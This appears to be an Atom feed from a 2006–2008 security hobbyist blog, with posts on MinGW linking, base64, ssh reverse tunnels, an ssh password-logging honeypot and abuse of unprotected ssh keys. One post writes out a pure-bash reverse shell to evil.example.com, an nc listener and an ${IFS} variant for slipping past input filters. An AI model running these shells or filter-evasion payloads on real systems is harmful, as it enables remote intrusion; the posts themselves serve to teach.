scheme='http://www.blogger.com/atom/ns#' 
term='mingw'/><category scheme='http://www.blogger.com/atom/ns#' term='ridiculous'/><category scheme='http://www.blogger.com/atom/ns#' term='problems linking ws2_32'/><title type='text'>Minimal indeed</title><content type='html'>&lt;a href="http://www.mingw.org/"&gt;Mingw&lt;/a&gt;, or Minimal GNU for Windows, is a really cool project.  The idea is to have a gcc that will run anywhere gcc will run and can make Windows executables.  It does this well, giving programmers the ability to link native Windows libraries in a non-windows environment.  It differs from the standard gcc in a significant way that I discovered this evening: order of arguments is quite important.  Whereas standard gcc will accept "&lt;code&gt;gcc code_that_uses_math_dot_h.c -lm&lt;/code&gt;" and "&lt;code&gt;gcc -lm code_that_uses_math_dot_h.c&lt;/code&gt;" as meaning exactly the same thing, mingw32-gcc is not so forgiving.&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;egypt@bastet ~ $ cat mintest.c &lt;br /&gt;#if defined( _WIN32 )&lt;br /&gt; #include &amp;lt;winsock2.h&amp;gt;&lt;br /&gt;#else&lt;br /&gt; typedef int SOCKET;&lt;br /&gt; #include &amp;lt;arpa/inet.h&amp;gt;&lt;br /&gt;#endif&lt;br /&gt;#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;#include &amp;lt;string.h&amp;gt;&lt;br /&gt;&lt;br /&gt;#define PORT 1234&lt;br /&gt;&lt;br /&gt;int main () { &lt;br /&gt;        struct sockaddr_in saddr;&lt;br /&gt;        SOCKET s;&lt;br /&gt;        SOCKET client;&lt;br /&gt;#if defined( _WIN32 )&lt;br /&gt;        WSADATA w;&lt;br /&gt;        WSAStartup(0x101, &amp;w);&lt;br /&gt;#endif&lt;br /&gt;        printf("Hello world\n");&lt;br /&gt;#if defined( _WIN32 )&lt;br /&gt;        WSACleanup();&lt;br /&gt;#endif&lt;br /&gt;        return 0;&lt;br /&gt;}&lt;br /&gt;egypt@bastet ~ $ mingw32-gcc -lws2_32 mintest.c -o mintest.exe &lt;br /&gt;/tmp/cc7dCAKg.o:mintest.c:(.text+0x29): undefined reference to `_WSAStartup@8'&lt;br /&gt;/tmp/cc7dCAKg.o:mintest.c:(.text+0x41): undefined reference to 
`_WSACleanup@0'&lt;br /&gt;collect2: ld returned 1 exit status&lt;br /&gt;egypt@bastet ~ (1) $ ls -l mintest.exe&lt;br /&gt;ls: cannot access mintest.exe: No such file or directory&lt;br /&gt;egypt@bastet ~ $ mingw32-gcc mintest.c -lws2_32 -o mintest.exe&lt;br /&gt;egypt@bastet ~ $ ls -l mintest.exe&lt;br /&gt;-rwxr-xr-x 1 egypt egypt 13K Mar 11 21:50 mintest.exe*&lt;br /&gt;egypt@bastet ~ $ file mintest.exe&lt;br /&gt;mintest.exe: MS-DOS executable PE  for MS Windows (console) Intel 80386 32-bit&lt;br /&gt;egypt@bastet ~ $ &lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;The moral of the story is this: if you're having trouble getting mingw to properly link a library, put the .c as your first argument. &lt;br /&gt;&lt;br /&gt;/me grumbles&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-1203291025523549314?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/1203291025523549314/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=1203291025523549314' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/1203291025523549314'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/1203291025523549314'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2008/03/minimal-indeed.html' title='Minimal indeed'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-7535343631234674833</id><published>2008-01-29T20:59:00.000-08:00</published><updated>2008-01-30T01:17:53.911-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bash'/><category scheme='http://www.blogger.com/atom/ns#' term='shovel'/><category scheme='http://www.blogger.com/atom/ns#' term='pure bash'/><title type='text'>/bin/bashed</title><content type='html'>Bash can read and write pipes on a specific file descriptor, like so:``&lt;tt&gt;echo foo &gt;&amp;2&lt;/tt&gt;'' which prints to file descriptor 2 and ``&lt;tt&gt;cat &lt;&amp;2&lt;/tt&gt;'' which reads from file descriptor 2.  Just like in the rest of the unix world, file descriptor 0 is stdin, 1 is stdout, and 2 is stderr unless they've been redirected.  In fact, we're not limited to 0, 1, and 2 -- we have up to 1023 to play with.  To open a new one, we use the syntax: ``&lt;tt&gt;cat 3&lt;&gt;foo.txt &lt;&amp;3&lt;/tt&gt;'' which has the same effect as ``&lt;tt&gt;cat foo.txt&lt;/tt&gt;'', but piped through file descriptor 3.&lt;br /&gt;&lt;br /&gt;Bash also has a little known feature that allows opening a tcp connection with the special filename: /dev/tcp/hostname/port.  ``&lt;tt&gt;echo foo &gt; /dev/tcp/example.com/9999&lt;/tt&gt;'' will perform a DNS lookup for example.com, attempt to connect to TCP port 9999 of the resulting IP address, and send the string "foo" to the socket.&lt;br /&gt;&lt;br /&gt;Putting these things together...&lt;br /&gt;&lt;pre&gt;&lt;b&gt;targetbox / $&lt;/b&gt; /bin/bash 3&lt;&gt;/dev/tcp/evil.example.com/9999 &lt;&amp;3 &gt;&amp;3 &amp;&lt;/pre&gt;&lt;br /&gt;and we've got a shell shoveler in pure bash, no outside executables.  
Catch it with: &lt;br /&gt;&lt;pre&gt;&lt;b&gt;evil / $&lt;/b&gt; nc -l -p 9999&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Same thing; pure bash, now with no spaces for getting around input filters:&lt;br /&gt;&lt;code&gt;eval${IFS}"bash${IFS:0:1}3&lt;&gt;/dev/tcp/evil.example.com/9999${IFS:0:1}&lt;&amp;3${IFS:0:1}&gt;&amp;3${IFS:0:1}&amp;"&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-7535343631234674833?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/7535343631234674833/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=7535343631234674833' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/7535343631234674833'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/7535343631234674833'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2008/01/binbashed.html' title='/bin/bashed'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-3203229173487740770</id><published>2008-01-28T21:47:00.000-08:00</published><updated>2008-01-28T21:48:01.244-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='base64'/><category scheme='http://www.blogger.com/atom/ns#' term='encoding'/><category scheme='http://www.blogger.com/atom/ns#' term='ridiculous'/><category scheme='http://www.blogger.com/atom/ns#' term='encryption'/><title 
type='text'>base64-encrypt()</title><content type='html'>&lt;a href="http://www.kb.cert.org/vuls/id/180876"&gt;http://www.kb.cert.org/vuls/id/180876&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Base64 encoding is just that: encoding.  It's a way to ensure that text with strange characters can be sent on the wire in an unambiguous, portable manner.  It is not, and was never meant to be, encryption.  There is no added security by encoding a password with base64.  Just like there is no added security by encoding a password with rot13.  It is no more than obfuscation; perhaps less than obfuscation since base64 on the wire sticks out and says, "Hey, look at me!"  Taking an authentication mechanism that is secured by real encryption and sending it back out in plaintext (or, equivalently, encoded with base64) is ridiculous.&lt;br /&gt;&lt;br /&gt;So don't ever do that.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-3203229173487740770?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/3203229173487740770/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=3203229173487740770' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/3203229173487740770'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/3203229173487740770'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2008/01/base64-encrypt.html' title='base64-encrypt()'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-1867989718313025033</id><published>2007-10-16T22:54:00.000-07:00</published><updated>2007-10-17T01:11:18.951-07:00</updated><title type='text'>The Perfect Phone</title><content type='html'>There's been a lot of hype lately about the iPhone.  It looks snazzy.  It has Wifi, EDGE, Bluetooth, and all the other bells and whistles a high-end phone is expected to have these days.  But it's not the phone for me.  Before the iPhone were several Nokia offerings that are almost up to my standards.  The Treo and the Blackberry look like the same story: almost what I want but not quite.&lt;br /&gt;&lt;br /&gt;What I want in a phone are these features:&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt;Wifi -- preferably with a chipset that allows me to run kismet.  Better yet would be one that allows me to run Lorcon and/or livetap.&lt;br /&gt;&lt;li&gt;Large amounts of flash storage.  I'd prefer this to be internal but I don't care what the medium is.  I'll buy extra storage media without complaining too much.  With as cheap as USB flash devices are getting these days, it should be a gigabyte at minimum.&lt;br /&gt;&lt;li&gt;charge over usb&lt;br /&gt;&lt;li&gt;a camera would be cool but not strictly necessary.  I used to think that I would prefer a phone with no camera because some places won't allow cameras.  I've recently come to realize that most places that don't allow cameras also don't allow phones.&lt;br /&gt;&lt;li&gt;Bluetooth for the sole purpose of connecting to a laptop and using the phone as a bridge.&lt;br /&gt;&lt;li&gt;a browser that handles javascript and flash decently.  
I know this isn't as big a problem as it used to be, but the five-lines-of-text-at-a-time that my old Samsung presented as "Internet" just doesn't cut it.&lt;br /&gt;&lt;li&gt;a big enough screen to display many lines of text.&lt;br /&gt;&lt;li&gt;Unix-like operating system.  This is necessary to be able to have a useful shell.&lt;br /&gt;&lt;li&gt;a good way to input text.  This is necessary to be able to interact with that shell.&lt;br /&gt;&lt;li&gt;Bash or the equivalent.  I can do everything on the commandline faster and more efficiently.  &lt;br /&gt;&lt;li&gt;an ssh client.  What's the point of being connected 24/7 if i can't be connected to the machines that do my bidding?  This also gets me to irc and other various programs that have become tethered to my brain over the last several years.&lt;br /&gt;&lt;li&gt;nmap -- this also means I need raw packets.&lt;br /&gt;&lt;li&gt;a ruby interpreter.&lt;br /&gt;&lt;li&gt;other third party applications (some of which will undoubtedly be written by me).&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;And I want it all without having to go through the pain and discomfort of JailBreak and other forms of warranty-voiding DMCA-violating kludges.&lt;br /&gt;&lt;br /&gt;Basically, I want my Thinkpad in a 4.5 x 2.5 x 0.5 inch, 5 ounce package that can make calls.&lt;br /&gt;&lt;br /&gt;The &lt;a href="http://openmoko.com/"&gt;FIC Neo1973&lt;/a&gt; looks very promising on the software front.  The entire phone is open; it's based on Linux and everything from the circuit boards to the kernel to the frontend is user modifiable.  That has strong appeal.  Unfortunately, it has no Wifi which makes it nearly useless to me.  The second generation, which does have wifi, is advertised as being available early 2008 but since it was advertised as being available on October 1 earlier this year, I'm not holding my breath.&lt;br /&gt;&lt;br /&gt;The iPhone has nice hardware and a nice interface.  But for it to be useful requires breaking laws.  
I boycott products that have that property in the hopes that manufacturers will start making things open enough to be useful for more than their own highly-defined and highly-limited idea of useful.&lt;br /&gt;&lt;br /&gt;The Nokia N800 looks like everything I want -- Linux-based; wifi; third party development is encouraged; hell, &lt;a href="http://immunitysec.com/products-silica.shtml"&gt;Immunity&lt;/a&gt; built a pentesting tool out of them -- but it's not a phone.  Maybe I'll just get one of these and keep my crappy free-with-service-agreement 6103.  I would be much more interested in the Nokia E90 if it ran Linux.  I just can't justify a thousand dollars for a phone without being sure beforehand that I'll like it.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-1867989718313025033?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/1867989718313025033/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=1867989718313025033' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/1867989718313025033'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/1867989718313025033'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2007/10/perfect-phone.html' title='The Perfect Phone'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-8797247883959538351</id><published>2007-06-11T20:14:00.000-07:00</published><updated>2007-06-11T21:33:30.121-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mosquito'/><category scheme='http://www.blogger.com/atom/ns#' term='mosref'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>Ephemeral: adj. lasting for only a short period.</title><content type='html'>&lt;a href="http://mosref.sourceforge.net/repos/mosvm/"&gt;Mosref&lt;/a&gt; (MOsquito Remote Execution Framework) is what Metasploit's Meterpreter really wants to be.  It is (on paper) a platform-agnostic virtual machine and Lisp interpreter with strong encryption on top of multiple communication channels.  In reality, I could never get it to compile; nor could many other people based on the conversation in the mosref mailing list.  And even if I could have, I would have had to learn the Mosquito dialect of Lisp for it to be any kind of useful.&lt;br /&gt;&lt;br /&gt;After Wes Brown's and Scott Dunlop's talk about it at Defcon 14, I really wanted to see Mosquito succeed.  Unfortunately, it never had any updates after that talk (the last developer cvs transaction according to source forge was the initial commit).  The mailing list contained almost no discussion of development.  This afternoon I visited ephemeralsecurity.com only to discover that the domain is now parked by an advertiser and whois lists the owner as "Domain Discreet".  I was disappointed to learn this but not surprised.&lt;br /&gt;&lt;br /&gt;Oh, well.  
If you want a platform-independent in-memory rootkit, you'll just have to write it yourself.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-8797247883959538351?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/8797247883959538351/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=8797247883959538351' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/8797247883959538351'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/8797247883959538351'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2007/06/ephemeral-adj-lasting-for-only-short.html' title='Ephemeral: adj. lasting for only a short period.'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-7856632778203096874</id><published>2007-01-23T07:43:00.000-08:00</published><updated>2007-02-06T18:36:36.367-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sshd'/><category scheme='http://www.blogger.com/atom/ns#' term='ssh'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>Turnabout</title><content type='html'>My home firewall runs an ssh server.  Every few days, I go through my logs and find that someone has been attempting to guess account names and passwords on that server.  
For a while, I just allowed it to continue because I found it interesting to see what usernames were being guessed.  After a few months of getting guess attempts every couple of seconds with almost no interruptions from dozens of ip addresses, I decided I didn't want to take the risk of somebody actually getting in and set up iptables rules to blackhole any ip address that sent more than ten SYN packets to ssh in less than two minutes.  A friend pointed me to &lt;a href="http://denyhosts.sourceforge.net/"&gt;denyhosts&lt;/a&gt;, a tool to watch your logs for failed ssh attempts and put the offending host into your /etc/hosts.deny for a certain period of time.  This is effectively the same as the iptables rules.  Both of these methods are very effective but not as interesting as seeing all the usernames tried.  So I downloaded the source for openssh-4.4p1 and made a few modifications.  My new sshd:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Logs all connections&lt;/li&gt;&lt;li&gt;Logs usernames &lt;span style="font-style:italic;"&gt;and passwords&lt;/span&gt;&lt;/li&gt;&lt;li&gt;Never opens a shell no matter what&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;If you'd like to set this up yourself, you can download &lt;a href="http://egypt.homelinux.net/openssh-logger.tar.gz"&gt;the complete source&lt;/a&gt;, or if you already have the source for openssh-4.4p1, and don't want to download the whole thing just for a few modifications you can get just &lt;a href="http://egypt.homelinux.net/openssh-4.4p1Logger.diff"&gt;the diff&lt;/a&gt;.  Then run the following commands: &lt;pre&gt;&lt;br /&gt;tar xzvf openssh-logger.tar.gz&lt;br /&gt;cd openssh-logger&lt;br /&gt;./configure --prefix /usr/honey/ \&lt;br /&gt;  --with-privsep-path=/usr/honey/chroot \&lt;br /&gt;  --with-pid-dir=/usr/honey/var/run&lt;br /&gt;make&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;The purpose of putting it in a strange directory is that we don't want to hose your real ssh server.  
If that went well, run:&lt;pre&gt;&lt;br /&gt;su&lt;br /&gt;make install&lt;br /&gt;touch /usr/honey/chroot/sshattacks.log&lt;br /&gt;chown sshd:sshd /usr/honey/chroot/sshattacks.log&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Remember: if you run a real ssh server, you'll want to change the port it listens on in your /etc/ssh/sshd_config.  You can add a section to your ~/.ssh/config like this:&lt;pre&gt;&lt;br /&gt;Host &amp;lt;hostname&amp;gt;&lt;br /&gt;  Port &amp;lt;real server's port&amp;gt;&lt;br /&gt;&lt;/pre&gt; so your client will connect to the correct server.  Now everything should be set up and you should start seeing brute force attacks in /usr/honey/chroot/sshattacks.log in no more than a couple of days.&lt;br /&gt;&lt;br /&gt;Output will look something like this:&lt;br /&gt;&lt;code&gt;&lt;br /&gt;host: 10.0.0.100 port: 45677&lt;br /&gt;user: root pass: root&lt;br /&gt;user: root pass: t00r&lt;br /&gt;user: root pass: r00t&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;Happy hunting!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-7856632778203096874?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/7856632778203096874/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=7856632778203096874' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/7856632778203096874'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/7856632778203096874'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2007/01/turnabout.html' title='Turnabout'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image 
rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-7556454244407719413</id><published>2007-01-15T20:32:00.000-08:00</published><updated>2007-01-30T20:10:07.802-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ssh'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>Nastier tricks with ssh</title><content type='html'>In my daily blog reading a week or so ago, I stumbled on &lt;a href="http://spoofed.org/blog"&gt;Jon Hart's blog&lt;/a&gt;.   In it, he notes the facts that root can read any file whatsoever on a *nix system and that ssh agent forwarding is accomplished using unix sockets.  The corollary to this is that root (or someone with access to your account) can steal your password-protected ssh keys after you decrypt them.&lt;br /&gt;&lt;br /&gt;Having used key-based authentication on a regular basis myself, this got me to thinking about other possibilities for an unrestricted user.  As it turns out, if a user can read someone else's private key file, one can authenticate with it.  
Long story short, &lt;a href="http://egypt.homelinux.net/~egypt/tools/double0seven"&gt;I've modified&lt;/a&gt; &lt;a href="http://spoofed.org/blog/2006/12/secret_agent.html"&gt;Jon's code&lt;/a&gt; to also search out non-password-protected keyfiles and attempt to abuse them.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-7556454244407719413?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/7556454244407719413/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=7556454244407719413' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/7556454244407719413'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/7556454244407719413'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2007/01/nastier-tricks-with-ssh.html' title='Nastier tricks with ssh'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-7939660083973592050</id><published>2007-01-12T18:27:00.000-08:00</published><updated>2007-01-30T20:14:58.232-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='screen'/><category scheme='http://www.blogger.com/atom/ns#' term='ssh'/><title type='text'>On ssh and timeouts</title><content type='html'>It turns out that ssh by default doesn't like to stay connected forever.  
If you set up a port forward as &lt;a href="2006/12/tricks-with-ssh.html"&gt;described below&lt;/a&gt; and don't connect to it right away, one end or the other will time out (not sure which, but it doesn't really matter).  To circumvent this issue, I've taken to setting up the forward, connecting to the remote box, then connecting through the port forward in a &lt;a href="http://www.gnu.org/software/screen/"&gt;screen&lt;/a&gt; session, and detaching screen (or not, depending on my mood).  Now ssh won't be able to tell that there's no interaction and will stay connected indefinitely.&lt;br /&gt;&lt;br /&gt;Incidentally, if you love the power of the command line and haven't heard of screen, you should install it at the earliest opportunity.  Thank me later.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-7939660083973592050?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/7939660083973592050/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=7939660083973592050' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/7939660083973592050'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/7939660083973592050'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2007/01/it-turns-out-that-ssh-by-default-doesnt.html' title='On ssh and timeouts'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-5421490748438829582</id><published>2006-12-17T12:48:00.000-08:00</published><updated>2006-12-19T21:14:24.065-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ssh'/><category scheme='http://www.blogger.com/atom/ns#' term='intar-tubes'/><title type='text'>Tricks with SSH</title><content type='html'>Do you want to ssh to your NATed box at home?  Want to connect in to your machine at work that drops SYN packets at the perimeter?  Tired of having to live without tab-completion and other handy features when an exploit sends a shell back to netcat?  SSH to the rescue.&lt;br /&gt;&lt;br /&gt;First, from the firewalled machine (call it BoxA) run:&lt;br /&gt;&lt;code&gt;ssh -nNT -R 2222:localhost:22 user@boxb.example.com &amp;&lt;/code&gt;&lt;br /&gt;then on BoxB.example.com:&lt;br /&gt;&lt;code&gt;ssh user@localhost -p2222&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;So what exactly does this do?  Let's take a look at the relevant sections from ``man ssh'':&lt;br /&gt;&lt;code&gt;&lt;br /&gt;-n Redirects stdin from /dev/null (actually, prevents reading from stdin).  This must be used when ssh is run in the background.&lt;br /&gt;&lt;br /&gt;-N Do not execute a remote command.  This is useful for just forwarding ports (protocol version 2 only).&lt;br /&gt;&lt;br /&gt;-T Disable pseudo-tty allocation.&lt;br /&gt;&lt;br /&gt;-R [bind_address:]port:host:hostport&lt;br /&gt;Specifies that the given port on the remote (server) host is to be forwarded to the given host and port on the local side.  
This works by allocating a socket to listen to &lt;u&gt;port&lt;/u&gt; on the remote side, and whenever a connection is made to this port, the connection is forwarded over the secure channel, and a connection is made to host port &lt;u&gt;hostport&lt;/u&gt; from the local machine.&lt;br /&gt;...&lt;br /&gt;By default, the listening socket on the server will be bound to the loopback interface only.  This may be overridden by specifying a &lt;u&gt;bind_address&lt;/u&gt;.&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;``-nNT'' means we aren't going to give ssh any input, so don't execute a shell and don't allocate a tty.  -R is a little trickier; it says start forwarding port 2222 of the remote machine (BoxB) to port 22 of the machine you're running ssh from (BoxA).  Now when you run &lt;code&gt;ssh localhost -p2222&lt;/code&gt;, you're connecting to the port forward that you just set up, which sends your connection through an encrypted tunnel to BoxA, bypassing the firewall rules because the tunnel is already connected.&lt;br /&gt;&lt;br /&gt;Caveats:&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt;You're connecting to localhost from BoxB but the traffic is actually going to BoxA.  This will confuse ssh, which thinks that localhost should have the same fingerprint each time.  To get around this, you'll likely have to delete the line beginning with ``localhost'' in your &lt;code&gt;~/.ssh/known_hosts&lt;/code&gt;.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;If you're using an exploit you'll have to know the account's password (or steal an ssh key)&lt;/li&gt;&lt;br /&gt;&lt;li&gt;Don't complain to me if your sysadmin gets mad and blocks outbound ssh.  =)&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;I love open source.  
They've really thought of everything.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-5421490748438829582?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/5421490748438829582/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=5421490748438829582' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/5421490748438829582'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/5421490748438829582'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2006/12/tricks-with-ssh.html' title='Tricks with SSH'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-4237451992364833437</id><published>2006-11-21T20:50:00.000-08:00</published><updated>2006-11-21T22:48:45.844-08:00</updated><title type='text'>Securosis and Daringflamebait</title><content type='html'>I'm constantly updating my daily blog list and today I stumbled on securosis.com.  He's got decent &lt;a href="http://securosis.com/2006/11/21/repost-the-securosis-top-6-tips-for-safe-online-holiday-shopping/"&gt;advice&lt;/a&gt; for the less technically savvy (which happens to mirror a lot of what I've been telling the uninitiated for a while now).  
